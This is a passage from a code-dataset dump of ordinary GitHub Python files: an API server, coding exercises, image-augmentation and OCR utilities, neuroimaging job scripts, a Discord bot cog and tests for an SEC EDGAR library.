{context}')\n request = None\n try:\n data_string = self.rfile.read(int(self.headers[\"Content-Length\"]))\n request = json.loads(data_string)\n except:\n logging.error(\"Failed to read request body.\")\n code = BAD_REQUEST\n\n if request:\n path = self.path.strip(\"/\")\n logging.info(\"%s: %s %s\" % (self.path, data_string, context[\"request_id\"]))\n if path in self.router:\n try:\n response, code = self.router[path](\n {\"body\": request, \"headers\": self.headers},\n context,\n self.store\n )\n except Exception as e:\n logging.exception(\"Unexpected error: %s\" % e)\n code = INTERNAL_ERROR\n else:\n code = NOT_FOUND\n\n self.send_response(code)\n self.send_header(\"Content-Type\", \"application/json\")\n self.end_headers()\n if code not in ERRORS:\n r = {\"response\": response, \"code\": code}\n else:\n r = {\"error\": response or ERRORS.get(code, \"Unknown Error\"), \"code\": code}\n context.update(r)\n logging.info(context)\n self.wfile.write(json.dumps(r).encode())\n return\n\n\nif __name__ == \"__main__\":\n op = OptionParser()\n op.add_option(\"-p\", \"--port\", action=\"store\", type=int, default=8080)\n op.add_option(\"-l\", \"--log\", action=\"store\", default=None)\n (opts, args) = op.parse_args()\n logging.basicConfig(\n filename=opts.log,\n level=logging.INFO,\n format=\"[%(asctime)s] %(levelname).1s %(message)s\",\n datefmt=\"%Y.%m.%d %H:%M:%S\"\n )\n server = HTTPServer((\"localhost\", opts.port), MainHTTPHandler)\n logging.info(\"Starting server at %s\" % opts.port)\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n pass\n server.server_close()\n","repo_name":"AndreyAD1/scoring","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":7801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73098236327","text":"# ---------- Import ----------\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Main ----------\nINPUT = input().rstrip().split(\"-\")\n\n# Seperate by -, and sum each index\nfor i, v in enumerate(INPUT):\n popleft = v.split(\"+\")\n \n tmp = 0\n for idx in popleft:\n tmp += int(idx)\n \n INPUT[i] = tmp\n \n# Sum all minus index \nsum = INPUT[0] * 2\nfor i in INPUT:\n sum -= i\n \nprint(sum)","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_1541.py","file_name":"acmicpc_1541.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29301977601","text":"def isPrime(a):\n if a==1:\n return False\n for i in range(2,a):\n if a%i==0:\n return False\n return True\n\nfor a in range(1,100):\n if isPrime(a):\n print(a)\n","repo_name":"EmreDogu/programming-fundementals-labs","sub_path":"Python3/isPrimev2.py","file_name":"isPrimev2.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15711027087","text":"\"\"\"\nIdea: Could show the progression to make this an increasingly general tool.\n\nThis script uses the first column in a csv file as a key and the second column as a value.\nRun as \n\n$ python sorted_data.csv\n\"\"\"\n\nimport sys\nimport csv\nimport itertools\n\n\n\n#statistic = max\n\ndef numeric_range(x):\n \"\"\"\n Find the minimum and maximum values that appear in an iterable object x\n\n >>> numeric_range([100, 0, 78])\n {'max': 100, 'min': 0}\n \"\"\"\n i1, i2 = itertools.tee(x)\n result = {}\n result[\"min\"] = min(i1)\n result[\"max\"] = max(i2)\n return result\n\n\n# 
argparse will let you use named arguments\n#fname = sys.argv[1]\n\nfname = \"sorted_data.csv\"\nf = open(fname)\nreader = csv.reader(f)\nline = next(reader)\ngrouped = itertools.groupby(reader, key = lambda x: x[0])\ng1 = next(grouped)\n\n#list(g1[1])\n\nvalues = (float(x[1]) for x in g1[1])\nnumeric_range(values)\n\n# Iterators maintain state. Once they are exhausted we cannot go back.\n\n# Iterators can be confusing when you don't know what's in them.\n# list will take an iterator as input and materialize it in a list.\n\n# We could get everything as \n# list(g1[1])\n\n# Sometimes we don't want everything, so we can just select the first few elements.\n# In R and bash we used head.\n# For an iterator in Python we can use itertools.islice\n\nlist(itertools.islice(g1[1], 5))\n\n\n\nfname = \"sorted_data.csv\"\nwith open(fname) as f:\n reader = csv.reader(f)\n grouped = itertools.groupby(reader, key = lambda x: x[0])\n result = {}\n for g in grouped:\n key = g[0]\n values = (float(x[1]) for x in g[1])\n result[key] = numeric_range(values)\n\n\n# Alternatively - yuck.\n#fname = \"sorted_data.csv\"\n#with open(fname) as f:\n# reader = csv.reader(f)\n# row = next(reader)\n# key = row[0]\n# cur_max = cur_min = row[1]\n# result = {key: {\"max\": cur_max, \"min\": cur_min}}\n# for g in grouped:\n# key = g[0]\n# values = (float(x[1]) for x in g[1])\n# result[key] = numeric_range(values)\n\n\n\n#list(g1[1])\n\n\n\nif __name__ == \"__main__\":\n print(\"Testing\")\n import doctest\n doctest.testmod()\n","repo_name":"clarkfitzg/sta141c-winter19","sub_path":"examples/grouper.py","file_name":"grouper.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"15293213529","text":"import os\nimport uuid\nimport random\nimport cv2\nfrom functions import *\nimport numpy as np\n\n\n\n#BLUR\ndef blur_image(img, output_directory=\"output\"): \n\n width = random.randint(1, 50) #w, h are filter value\n height = random.randint(1, 50)\n\n #blur image \n blurred_image = cv2.blur(img, ksize=(width, height))\n\n # Make a random name for it\n name = str(uuid.uuid4())[:8]\n\n #save image with random name into output folder\n output_path = os.path.join(output_directory, f\"{name}.jpg\")\n cv2.imwrite(output_path, blurred_image)\n\n return blurred_image\n\n\n\n#CROP\ndef crop_image(image, output_directory=\"output\"):\n # Get image dimensions\n width, height = image.shape[:2]\n\n # Determine random coordinates for the top-left corner of the cropped region\n x = random.randint(0, width // 2)\n y = random.randint(0, height // 2)\n\n # Crop the image\n cropped_image = image[y:y + height // 2, x:x + width // 2]\n\n # Generate a random name for the output image\n name = str(uuid.uuid4())[:8] + \".jpg\"\n output_image_path = os.path.join(output_directory, name)\n\n # Save the cropped image\n cv2.imwrite(output_image_path, cropped_image)\n\n return cropped_image\n\n\n\n#ROTATE\ndef rotate_image(img, output_directory='output'):\n # Generate a random rotation angle between 0 and 360 degrees\n rotate_angle = random.randint(0, 360)\n # Rotate the image\n rows, cols = img.shape[:2]\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), rotate_angle, 1)\n rotated_img = cv2.warpAffine(img, M, (cols, rows))\n\n # Generate a random name for the output image\n name = str(uuid.uuid4())[:8] + \".jpg\"\n\n # Save the rotation variation image to the output directory\n output_path = os.path.join(output_directory, name)\n cv2.imwrite(output_path, 
rotated_img)\n\n return rotated_img\n\n\n\n#FLIP\ndef flip_image(img,output_directory='output'):\n # Generate a random flip direction\n flip_direction = random.choice(['horizontal', 'vertical'])\n\n # Flip the rotated image\n if flip_direction == 'horizontal':\n flipped_img = cv2.flip(img, 1)\n else:\n flipped_img = cv2.flip(img, 0)\n\n # Generate a random name for the output image\n name = str(uuid.uuid4())[:8] + \".jpg\"\n\n # Save the flip variation image to the output directory\n output_path = os.path.join(output_directory, name)\n cv2.imwrite(output_path, flipped_img)\n\n return flipped_img\n\n\n\n#EDGE DETECTION\ndef find_edge(img, output_directory=\"output\"):\n\n #blur image \n blurred_image = cv2.Canny(img, 100, 200)\n\n #random name for it\n name = str(uuid.uuid4())[:8]\n\n #save image with random name into output folder\n output_path = os.path.join(output_directory, f\"{name}.jpg\")\n cv2.imwrite(output_path, blurred_image)\n\n return blurred_image\n\n\n\n#GRAY SCALE\ndef gray_scale(image, output_folder=\"output\"):\n # Convert the image to grayscale\n grayscale_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Generate a random name for the grayscale image\n new_filename = str(uuid.uuid4())[:8] + \".jpg\"\n\n # Save the grayscale image\n output_path = os.path.join(output_folder, new_filename)\n cv2.imwrite(output_path, grayscale_image)\n\n return grayscale_image\n\ndef change_color_image(img, output_folder=\"output\"):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # Tạo filter ngẫu nhiên\n filt = random.randint(1,20)\n\n if filt == 1:\n # Lọc tươi mới\n img = np.array(img * [1.1, 1.2, 0.9], dtype=np.uint8)\n\n elif filt == 2:\n # Lọc trong suốt\n img = np.array(img * [0.9, 1.1, 1.1], dtype=np.uint8)\n \n elif filt == 3:\n # Lọc ấm áp\n img = np.array(img * [1.2, 1.1, 0.9], dtype=np.uint8)\n\n elif filt == 4:\n\n img[0,:,:] = [255,255,255]\n img[:,0,:] = [255,255,255]\n img[-1,:,:] = [255,255,255]\n img[:,-1,:] = [255,255,255]\n img[1:-1,1:-1,:] = np.array(img[1:-1,1:-1,:] * [0.8,0.8,0.8], dtype=np.uint8)\n\n elif filt == 5:\n # Lọc màu vàng hiện đại\n img = np.array(img * [1.1, 1.1, 0.8], dtype=np.uint8)\n\n elif filt == 6:\n # Lọc nóng\n img = np.array(img * [1.1, 0.9, 0.9], dtype=np.uint8)\n\n elif filt == 7:\n # Lọc cổ điển\n img = np.array(img * [0.9, 0.9, 1.2], dtype=np.uint8)\n\n elif filt == 8:\n # Lọc mùa xuân \n img = np.array(img * [1.1, 1.2, 1], dtype=np.uint8)\n\n elif filt == 9:\n # Lọc sương mù\n img = np.array(img * [0.6, 0.6, 0.6], dtype=np.uint8)\n\n elif filt == 10:\n # Lọc mùa thu\n img = np.array(img * [1.2, 1, 0.8], dtype=np.uint8)\n\n elif filt == 11:\n # Lọc sharpen\n img = np.array(img * [1.5, 1.5, 1.5], dtype=np.uint8)\n\n elif filt == 12:\n # Lọc nhiễu \n noise = np.random.randint(-50,50,img.shape)\n img = img + noise\n img = np.clip(img, 0, 255)\n\n elif filt == 13:\n # Lọc tông xanh\n img = np.array(img * [1, 1.5, 1.5], dtype=np.uint8)\n\n elif filt == 14:\n # Lọc đồng quê\n img = np.array(img * [0.9, 0.9, 1.1], dtype=np.uint8)\n\n elif filt == 15:\n # Lọc hoàng hôn\n img = np.array(img * [1.1, 0.8, 0.9], dtype=np.uint8)\n\n elif filt == 16:\n # Lọc thành phố\n img = np.array(img * [0.8, 0.8, 1.2], dtype=np.uint8)\n\n elif filt == 17:\n # Lọc thực phẩm\n img = np.array(img * [1.2, 0.9, 0.8], dtype=np.uint8)\n\n elif filt == 18:\n # Lọc khu rừng\n img = np.array(img * [0.9, 1.1, 1], dtype=np.uint8)\n\n elif filt == 19:\n # Lọc mùa đông\n img = np.array(img * [1.1, 0.8, 1.2], dtype=np.uint8)\n\n elif filt == 20:\n # Lọc mùa hè\n img = 
np.array(img * [1.2, 0.9, 0.8], dtype=np.uint8)\n\n # Tạo tên ngẫu nhiên cho file ảnh\n new_name = str(uuid.uuid4())[:8] + \".jpg\"\n\n # Lưu ảnh với tên mới \n output_path = os.path.join(output_folder, new_name)\n cv2.imwrite(output_path, cv2.cvtColor(img, cv2.COLOR_RGB2BGR))\n\n return img","repo_name":"sinhvienfpt/image_editting_tool","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30574514482","text":"from django.shortcuts import render\nfrom django.views import View\n\n\nclass CertyfikatyView(View):\n def get(self, request):\n context = {\n 'title': 'Certyfikaty',\n 'description': 'Jesteśmy wykwalifikowaną firmą montującą kamery, alarmy oraz inne systemy.',\n 'keywords': '',\n }\n return render(request, 'sites/web/certyfikaty.html', context)\n","repo_name":"Maniek2341/gsmmonit","sub_path":"website/views/certyfikaty_view.py","file_name":"certyfikaty_view.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42353927582","text":"#En una determinada empresa, sus empleados son evaluados al final de cada año. Los puntos que pueden obtener en la evaluación comienzan en 0.0 y pueden ir aumentando, traduciéndose en mejores beneficios. Los puntos que pueden conseguir los empleados pueden ser 0.0, 0.4, 0.6 o más, pero no valores intermedios entre las cifras mencionadas. A continuación se muestra una tabla con los niveles correspondientes a cada puntuación. La cantidad de dinero conseguida en cada nivel es de 2.400€ multiplicada por la puntuación del nivel.\n\ndef comprobarNivel(points):\n if points == 0.0 or points == 0.4 or points >= 0.6:\n return True\n else:\n return False\n\n\ndef pruebaNivel(points):\n if points == 0.0:\n return \"Inaceptable\"\n elif points == 0.4:\n return \"Aceptable\"\n else:\n return \"Meritorio\"\n\n\n\n\n\ndef main():\n \n puntos = float(input(\"Dime tu nivel, 0.0, 0.4, 0.6 o más \"))\n \n if comprobarNivel(puntos) == True:\n print (pruebaNivel(puntos) , (2400 * puntos))\n else:\n print(\"**ERROR**\")\n\nif __name__==\"__main__\":\n main()\n\n#perfe","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-Eperyaq","sub_path":"src/ejercicios2_1_8.py","file_name":"ejercicios2_1_8.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38633609118","text":"from __future__ import print_function\nimport os\nimport sys\nimport subprocess\n# import subprocess\n# import numpy as np\n# from mne.preprocessing.maxfilter import apply_maxfilter\n\nCLOBBER = False\nFAKE = False\nVERBOSE = True\n\n# ENH: install \"official\" version of stormdb on isis/hyades\npath_to_stormdb = '/usr/local/common/meeg-cfin/stormdb'\n# path_to_stormdb = \"/volatile/mje/meeg-cfin/stormdb\"\nsys.path.append(path_to_stormdb)\n\nfrom stormdb.access import Query\n\n# path to submit_to_isis\ncmd = \"/usr/local/common/meeg-cfin/configurations/bin/submit_to_isis\"\nproj_code = \"MINDLAB2015_MEG-CorticalAlphaAttention\"\n\ndb = Query(proj_code)\nproj_folder = os.path.join('/projects', proj_code)\nscratch_folder = os.path.join(proj_folder, 'scratch/')\nfs_subjects_dir = os.path.join(scratch_folder, 'fs_subjects_dir/')\n\nsubjects_dir = os.path.join(scratch_folder, 'fs_subjects_dir')\nscript_dir = proj_folder + '/scripts/'\n\nincluded_subjects = 
db.get_subjects()\n\n\ndef make_symbolic_links(subject, subjects_dir):\n \"\"\"Make symblic links between FS dir and subjects_dir.\n\n Parameters\n ----------\n fname : string\n The name of the subject to create for\n subjects_dir : string\n The subjects dir for FreeSurfer\n \"\"\"\n\n make_links = \"ln -s fs_%s/* .\" % subject[:4]\n os.chdir(fs_subjects_dir + subject[:4])\n subprocess.call([cmd, \"1\", make_links])\n\n\ndef convert_surfaces(subject, subjects_dir):\n \"\"\"Convert the SimNIBS surface to FreeSurfer surfaces.\n\n Parameters\n ----------\n subject : string\n The name of the subject\n subjects_dir : string\n The subjects dir for FreeSurfer\n \"\"\"\n convert_csf = \"meshfix csf.stl -u 10 --vertices 4098 --fsmesh\"\n convert_skull = \"meshfix skull.stl -u 10 --vertices 4098 --fsmesh\"\n convert_skin = \"meshfix skin.stl -u 10 --vertices 4098 --fsmesh\"\n\n os.chdir(fs_subjects_dir + subject[:4] + \"/m2m_%s\" % subject[:4])\n subprocess.call([cmd, \"1\", convert_csf])\n subprocess.call([cmd, \"1\", convert_skull])\n subprocess.call([cmd, \"1\", convert_skin])\n\n\ndef copy_surfaces(subject, subjects_dir):\n \"\"\"Copy the converted FreeSurfer surfaces to the bem dir.\n\n Parameters\n ----------\n subject : string\n The name of the subject\n subjects_dir : string\n The subjects dir for FreeSurfer\n \"\"\"\n os.chdir(fs_subjects_dir + subject[:4] + \"/m2m_%s\" % subject[:4])\n copy_inner_skull = \"cp -f csf_fixed.fsmesh \" + subjects_dir + \\\n \"/%s/bem/inner_skull.surf\" % subject[:4]\n copy_outer_skull = \"cp -f skull_fixed.fsmesh \" + subjects_dir + \\\n \"/%s/bem/outer_skull.surf\" % subject[:4]\n copy_outer_skin = \"cp -f skin_fixed.fsmesh \" + subjects_dir + \\\n \"/%s/bem/outer_skin.surf\" % subject[:4]\n\n subprocess.call([cmd, \"1\", copy_inner_skull])\n subprocess.call([cmd, \"1\", copy_outer_skull])\n subprocess.call([cmd, \"1\", copy_outer_skin])\n\n os.chdir(fs_subjects_dir + subject[:4] + \"/bem\")\n convert_skin_to_head = \"mne_surf2bem --surf outer_skin.surf --fif %s-head.fif --id 4\" % subject[:4]\n subprocess.call([cmd, \"1\", convert_skin_to_head])\n\n\ndef setup_mne_c_forward(subject):\n setup_forward = \"mne_setup_forward_model --subject %s --surf --ico -6\" %subject[:4]\n subprocess.call([cmd, \"1\", setup_forward])\n\n\nfor subject in included_subjects[3:5]:\n make_symbolic_links(subject, fs_subjects_dir)\n \nfor subject in included_subjects[3:5]:\n convert_surfaces(subject, fs_subjects_dir) \n\nfor subject in included_subjects[3:5]:\n copy_surfaces(subject, fs_subjects_dir) \n\nfor subject in included_subjects[3:5]:\n setup_mne_c_forward(subject) \n\n","repo_name":"MadsJensen/malthe_alpha_project","sub_path":"simnibs_functions.py","file_name":"simnibs_functions.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20367029659","text":"from threading import Thread, Lock, Semaphore\r\nfrom time import sleep\r\nfrom random import randint\r\n\r\nBUFFER_SIZE = 15\r\nNUM_ITEMS = 20\r\n\r\nclass Productor(Thread):\r\n \r\n def __init__(self, mutex, sem_huecos, sem_items, buffer,index_p, index_c):\r\n Thread.__init__(self)\r\n self.mutex = mutex\r\n self.sem_huecos = sem_huecos\r\n self.sem_items = sem_items\r\n self.buffer = buffer\r\n self.index_c = index_c\r\n self.index_p = index_p\r\n\r\n def run(self):\r\n for i in range(NUM_ITEMS):\r\n item = randint(1,100) \r\n sem_huecos.acquire()\r\n mutex.acquire()\r\n self.buffer[self.index_p] = item\r\n self.index_p = 
(self.index_p + 1) % BUFFER_SIZE\r\n print(\"PRODUCTOR:\", item, self.buffer)\r\n mutex.release()\r\n sem_items.release()\r\n sleep(randint(0,1))\r\n\r\nclass Consumidor(Thread):\r\n \r\n def __init__(self, mutex, sem_huecos, sem_items, buffer,index_p, index_c):\r\n Thread.__init__(self)\r\n self.mutex = mutex\r\n self.sem_huecos = sem_huecos\r\n self.sem_items = sem_items\r\n self.buffer = buffer\r\n self.index_c = index_c\r\n self.index_p = index_p\r\n\r\n def run(self):\r\n for i in range(NUM_ITEMS):\r\n sem_items.acquire()\r\n mutex.acquire()\r\n item = self.buffer[self.index_c]\r\n self.buffer[self.index_c] = 0\r\n self.index_c = (self.index_c + 1) % BUFFER_SIZE \r\n print('CONSUMIDOR:', item, self.buffer)\r\n mutex.release()\r\n sem_huecos.release() \r\n sleep(randint(1,3))\r\n\r\n\r\nif __name__ == '__main__':\r\n index_p = index_c = 0\r\n mutex = Lock()\r\n sem_items = Semaphore(0) \r\n sem_huecos = Semaphore(BUFFER_SIZE)\r\n buffer = [0] * BUFFER_SIZE\r\n\r\n p = Productor(mutex, sem_huecos, sem_items, buffer, index_p, index_c)\r\n p.start()\r\n\r\n c = Consumidor(mutex, sem_huecos, sem_items, buffer, index_p, index_c)\r\n c.start()\r\n\r\n p.join()\r\n c.join()","repo_name":"aldebarran22/curso_santander_1","sub_path":"productor_consumidor.py","file_name":"productor_consumidor.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"40316371233","text":"import discord\nfrom discord.ext import commands\n\nclass General(commands.Cog): \n def __init__(self,bot):\n self.bot=bot\n\n @commands.command()\n async def exp(self, ctx):\n await ctx.send(\"https://cdn.discordapp.com/attachments/637264326368952323/807527453303898152/exp.png\")\n \n @commands.command(aliases=['talent'])\n async def weekly(self, ctx):\n await ctx.send(\"https://media.discordapp.net/attachments/840489159642841118/855088556836782120/Talent_eng.png\")\n\n @commands.command()\n async def gi2021(self, ctx):\n await ctx.send(\"https://cdn.discordapp.com/attachments/812186655783780352/865075703983898644/Frame_11.png\")\n \ndef setup(bot):\n bot.add_cog(General(bot))\n","repo_name":"LuminetteBourgeons/Childe","sub_path":"genshin impact/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"71377320849","text":"from model import Cep\nimport app_util.cep_request as viacep\nfrom persistence import db\n\n\ndef cep_handler(cep_from_client):\n\n\tnum_cep = cep_from_client.replace('-', '')\n\n\tcep = query_cep_by_id(num_cep)\n\n\tif cep is None:\n\t\tnew_cep = viacep.get_cep(num_cep)\n\t\t\n\t\tdb.session.add(new_cep)\n\t\tdb.session.commit()\n\t\treturn new_cep\n\n\treturn cep\n\ndef query_cep_by_id(cep):\n\treturn Cep.query.filter_by(numero=cep).first()\n\ndef insert_cep(cep):\n\tdb.session.add(cep)\n\tdb.session.commit()\n\tdb.session.close()\n","repo_name":"bopopescu/Python_Personal_Projects","sub_path":"erp_confere/src/test/erp_confere/services/cep_service.py","file_name":"cep_service.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5746121443","text":"try:\n a = 20\n b = 0\n print(a/b)\nexcept ZeroDivisionError:\n print('there is a divide by 0 error')\n\ntry:\n a = 0\n b = 0\n print (a/b)\nexcept:\n print('second example')\nfinally:\n print('the code continues')\n\n\n def divide(a,b):\n 
try:\n return a/b\n except ZeroDivisionError:\n print(\"There is a divide by zero error\")\n return 0\n\n\n x = float(input('Enter a number'))\n y = float(input('Enter value by which you want to divide the number'))\n result = divide(x, y)\n print(result)\n","repo_name":"CEsarABC/Python-CI-","sub_path":"Python fundamentals/exception_handling.py","file_name":"exception_handling.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16128391567","text":"import cv2 as cv\r\nimport pytesseract \r\nfrom translator import Translations\r\n\r\nclass Do_Ocr():\r\n def __init__(self,path) -> None:\r\n self.img_path = path\r\n pytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\r\n \r\n def get_text(self)-> str:\r\n img = cv.imread(self.img_path,cv.IMREAD_GRAYSCALE)\r\n x,th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\r\n #img = cv.cvtColor(img, cv.COLOR_BGR2RGB) \r\n #x,th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\r\n output_text = pytesseract.image_to_string(th1) \r\n '''if True :#Translations.trans_late()\r\n tslate = Translations(output_text,'0b57146c3d8693bf6736a6ec24ba004e')\r\n return tslate.trans_late('en')'''\r\n return output_text\r\n \r\n def box_text(self):\r\n img = cv.imread(self.img_path)\r\n Himg,Wimg,Temp = img.shape\r\n boxes_list = pytesseract.image_to_boxes(img)\r\n for b in boxes_list.splitlines():\r\n #print(b)\r\n b = b.split(' ')\r\n #print(b)\r\n x,y,w,h = int(b[1]),int(b[2]),int(b[3]),int(b[4])\r\n cv.rectangle(img,(x,Himg-y),(w,Himg-h),(0,0,255),1)\r\n cv.putText(img,b[0],(x,Himg-y+25),cv.FONT_HERSHEY_COMPLEX_SMALL,1,(100,100,100),2)\r\n cv.imshow('Result',img)\r\n cv.waitKey(0)\r\n cv.destroyAllWindows()\r\n\r\n\r\n","repo_name":"NinadJoshi382/Image2Text_Translation","sub_path":"img_parser.py","file_name":"img_parser.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6481892858","text":"import datetime\n\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.compute as pc\nfrom datetime import datetime\nimport edgar\nfrom edgar._rich import *\nfrom edgar.core import (decode_content,\n get_identity,\n set_identity,\n ask_for_identity,\n display_size,\n Result,\n filter_by_date,\n http_client,\n InvalidDateException,\n client_headers,\n CRAWL, CAUTION, NORMAL,\n download_file,\n extract_dates,\n get_text_between_tags)\nimport re\nfrom rich.table import Table\nimport pytest\n\n\ndef test_decode_content():\n text = \"Kyle Walker vs Mbappe\"\n assert decode_content(text.encode('utf-8')) == text\n assert decode_content(text.encode('latin-1')) == text\n\n\ndef test_decode_latin1():\n text = \"Mbappe vs Messi\"\n assert decode_content(text.encode(\"latin-1\")) == text\n\n\ndef test_get_identity():\n identity = get_identity()\n assert identity\n\n\ndef test_get_identity_environment_variable_not_set(monkeypatch):\n monkeypatch.setattr('builtins.input', lambda: \"Tom Holland tholland@restishistory.com\")\n monkeypatch.delenv(\"EDGAR_IDENTITY\", raising=False)\n identity = get_identity()\n assert identity == \"Tom Holland tholland@restishistory.com\"\n\n\ndef test_set_identity():\n old_identity = get_identity()\n set_identity(\"Mike Tirico mtirico@cal.com\")\n assert get_identity() == \"Mike Tirico mtirico@cal.com\"\n set_identity(old_identity)\n\n\ndef test_ask_for_identity(monkeypatch):\n monkeypatch.setattr('builtins.input', 
lambda: \"Tom Holland tholland@restishistory.com\")\n identity = ask_for_identity()\n assert identity == \"Tom Holland tholland@restishistory.com\"\n\n\ndef test_ask_for_identity_prompt(monkeypatch, capsys):\n monkeypatch.setattr('builtins.input', lambda: \"Tom Holland tholland@restishistory.com\")\n identity = ask_for_identity(\"Who are you\")\n assert identity == \"Tom Holland tholland@restishistory.com\"\n captured = capsys.readouterr()\n assert 'Who are you' in captured.out\n\n\ndef test_ask_for_identity_keyboard_interrupt(monkeypatch):\n def input_interrupt():\n raise KeyboardInterrupt()\n\n monkeypatch.setattr('builtins.input', input_interrupt)\n with pytest.raises(TimeoutError) as exc:\n ask_for_identity(\"Who are you\")\n\n\ndef test_get_header():\n assert client_headers()['User-Agent'] == get_identity()\n\n\ndef test_download_index_file():\n xbrl_gz = download_file('https://www.sec.gov/Archives/edgar/full-index/2021/QTR1/xbrl.gz')\n assert isinstance(xbrl_gz, bytes)\n assert len(xbrl_gz) > 10000\n\n xbrl_idx = download_file('https://www.sec.gov/Archives/edgar/full-index/2021/QTR1/xbrl.idx')\n assert isinstance(xbrl_idx, str)\n\n\ndef test_df_to_rich_table():\n df = pd.read_csv('data/cereal.csv')\n table: Table = df_to_rich_table(df)\n assert table\n assert len(table.rows) == 21\n\n\ndef test_repr_rich():\n df = pd.read_csv('data/cereal.csv',\n usecols=['name', 'mfr', 'type', 'calories', 'protein', 'fat', 'sodium'])\n table: Table = df_to_rich_table(df)\n value = repr_rich(table)\n assert '100% Bran' in value\n\n\ndef test_result():\n result = Result.Ok(value=1)\n assert result.success\n assert not result.failure\n assert result.value == 1\n\n assert \"Success\" in str(result)\n\n result = Result.Fail(\"Does not work\")\n assert result.failure\n assert not result.success\n assert not result.value\n assert result.error == \"Does not work\"\n assert \"Failure\" in str(result)\n\n\ndef test_display_size():\n assert display_size(117000) == \"114.3 KB\"\n assert display_size(1170000) == \"1.1 MB\"\n assert display_size(\"117000\") == \"114.3 KB\"\n assert display_size(\"1170000\") == \"1.1 MB\"\n assert display_size(None) == \"\"\n assert display_size(\"aaa\") == \"\"\n assert display_size(\"\\x01\") == \"\"\n\n\ndef test_detect_charset():\n url = 'https://www.sec.gov/Archives/edgar/data/1089113/000165495420002467/a7664f.htm'\n client = http_client()\n r = client.get(url)\n print(r.encoding)\n assert r.encoding == 'ascii'\n\n\ndef test_download_image():\n url = 'https://www.sec.gov/Archives/edgar/data/1640147/000164014722000023/snow-20220131_g1.jpg'\n client = http_client()\n r = client.get(url)\n print(r.encoding)\n print(r.content)\n download_file(url)\n\n\ndef test_extract_dates():\n assert extract_dates(\"2022-03-04\") == (datetime.strptime(\"2022-03-04\", \"%Y-%m-%d\"), None, False)\n assert extract_dates(\"2022-03-04:\") == (datetime.strptime(\"2022-03-04\", \"%Y-%m-%d\"), None, True)\n assert extract_dates(\":2022-03-04\") == (None, datetime.strptime(\"2022-03-04\", \"%Y-%m-%d\"), True)\n assert extract_dates(\"2022-03-04:2022-04-04\") == (\n datetime.strptime(\"2022-03-04\", \"%Y-%m-%d\"), datetime.strptime(\"2022-04-04\", \"%Y-%m-%d\"), True)\n\n # Invalid dates\n with pytest.raises(InvalidDateException):\n extract_dates(\"2022-44-44\")\n\n\ndef test_invalid_date_exception():\n exception = InvalidDateException(\"Something went wrong\")\n assert str(exception) == \"Something went wrong\"\n\n\ndef test_filter_by_date():\n arrays = [pa.array(['a', 'b', 'c']),\n pa.array([3, 2, 
1]),\n pc.cast(pc.strptime(pa.array(['2013-04-24', '2015-12-03', '2017-08-10']), '%Y-%m-%d', 'us'), pa.date32())]\n\n # arrays[2] = pc.cast(pc.strptime(arrays[2], '%Y-%m-%d', 'us'), pa.date32())\n table = pa.Table.from_arrays(arrays,\n names=['item', 'value', 'date']\n )\n\n assert len(filter_by_date(table, '2013-04-24', 'date')) == 1\n assert len(filter_by_date(table, '2013-04-24:2016-04-24', 'date')) == 2\n\n # Use datetime to filter by date\n assert len(filter_by_date(table, datetime.strptime('2013-04-24', '%Y-%m-%d'), 'date')) == 1\n\n\ndef test_dataframe_pager():\n from edgar.core import DataPager\n import numpy as np\n df = pd.DataFrame({'A': np.random.randint(0, 100, size=150),\n 'B': np.random.randint(0, 100, size=150)})\n pager = DataPager(df, 100)\n # Test getting the first page\n first_page = pager.current()\n assert len(first_page) == 100\n\n # Test getting the next page\n second_page = pager.next()\n assert len(second_page) == 50\n assert all(first_page.iloc[-1] != second_page.iloc[0])\n\n # Test getting the previous page\n prev_page = pager.previous()\n assert len(prev_page) == 100\n assert all(first_page == prev_page)\n\n # Test going to the next page again\n next_page = pager.next()\n assert len(next_page) == 50\n assert all(second_page == next_page)\n\n # Test going to the next page when there is no more page\n last_page = pager.next()\n assert last_page is None\n\n\ndef test_settings():\n assert 